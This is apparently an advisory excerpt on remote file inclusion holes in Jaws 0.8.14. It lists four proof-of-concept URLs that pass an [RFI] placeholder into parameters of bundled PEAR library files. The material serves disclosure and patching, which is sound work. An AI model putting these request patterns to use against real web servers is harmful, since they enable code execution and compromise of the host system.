Exploiting these issues may allow a remote attacker to obtain sensitive information or execute arbitrary script code in the context of the Web server process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

Jaws 0.8.14 is vulnerable; other versions may also be affected. 

http://www.example.com/jaws/libraries/pear/MDB2.php?file_name=[RFI]
http://www.example.com/jaws/libraries/pear/Services/Weather.php?service=[RFI]
http://www.example.com/jaws/libraries/pear/SOAP/Transport.php?transport_include=[RFI]
http://www.example.com/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[RFI]